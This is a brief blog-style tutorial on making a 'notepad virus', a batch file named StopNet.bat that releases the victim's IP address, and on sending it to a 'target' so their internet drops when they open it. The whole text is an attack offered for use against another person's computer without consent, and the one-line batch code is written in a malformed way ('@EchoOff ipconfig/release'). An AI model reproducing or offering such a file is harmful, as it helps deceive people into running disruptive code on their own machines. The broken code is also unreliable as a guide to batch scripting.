How to stop someone else internet connection?

Today i am going to tell you that how can you stop someöne else's internet connection by just creating a simple notepad virus.So lets start...

1) Open Notepad In Your Pc And Copy/Paste Or Type The Following Code:

@EchoOff ipconfig/release

2. Now Save This As StopNet.bat(Name Can Be Anything But .bat Is Must)

3. Now Send This File To The Target. When The Target Open It His/Her Internet Will Stop.
